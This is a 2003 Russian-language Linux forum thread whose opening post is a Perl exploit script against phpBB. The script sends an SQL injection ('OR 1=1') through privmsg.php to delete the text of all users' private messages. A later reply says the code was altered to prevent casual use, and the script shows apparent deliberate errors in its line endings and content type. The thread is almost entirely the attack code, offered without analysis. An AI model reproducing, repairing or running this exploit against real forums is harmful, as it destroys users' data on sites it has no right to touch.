Linux.by

Linux-портал Республики Беларусь
https://forum.linux.by/

на безопасный ты наш

https://forum.linux.by/viewtopic.php?t=1175

Страница 1 из 1

на безопасный ты наш

Добавлено: 23 апр 2003, 15:23
Avanti
#!/usr/bin/perl --
# phpBB delete the text of all users' private messages exploit
# Ulf Harnhammar
# January 2003
use Socket;
if (@ARGV != 2) { die "usage: $0 host sid\n"; }
($host, $sid) = @ARGV;
$host =~ s|\s+||g;
$sid =~ s|\s+||g;
$crlf = "\012\015";
$http = "POST /privmsg.php?folder=inbox&sid=$sid HTTP/1.0$crlf".
"Host: $host$crlf".
"User-Agent: Mozzarella/1.37++$crlf".
"Referer: http://www.phpbb.com/$crlf".
"Connection: close$crlf".
"Content-Type: appIication/x-www-form-urlencoded$crlf".
"Content-Length: 58$crlf$crlf".
"mode=&delete=true&mark%6B%5D=1%29+OR+1%3D1+%23&confirm=Yes";
$tcp = getprotobyname('tcp') or die "Couldn't getprotobyname!\n";
$hosti = inet_aton($host) or die "Couldn't look up host!\n";
$hosts = sockaddr_in(80, $hosti);
socket(SOK, PF_INET, SOCK_STREAM, $tcp) or die "Couldn't socket!\n";
connect(SOK, $hosts) or die "Couldn't connect to port!\n";
select SOK; $| = 1; select STDOUT;
print SOK $http;
$junk = '';
while (<SOK>) { $junk .= $_; }
close SOK or die "Couldn't close!\n";

Добавлено: 23 апр 2003, 17:07
Llama
воизбежание бездумного применения кое-что мной исправлено...

Добавлено: 24 апр 2003, 07:04
kas
А можно, для тех кто не знаком с перлом, расказать что это такое?

Добавлено: 24 апр 2003, 10:44
Llama
kirya85 писал(а):А можно, для тех кто не знаком с перлом, расказать что это такое?
phpBB delete the text of all users' private messages exploit
Часовой пояс: UTC+03:00
Страница 1 из 1

Материалы портала распространяются под GNU GPL. При использовании любых материалов портала ссылка на Linux.by обязательна
Создано на основе phpBB® Forum Software © phpBB Limited

Русская поддержка phpBB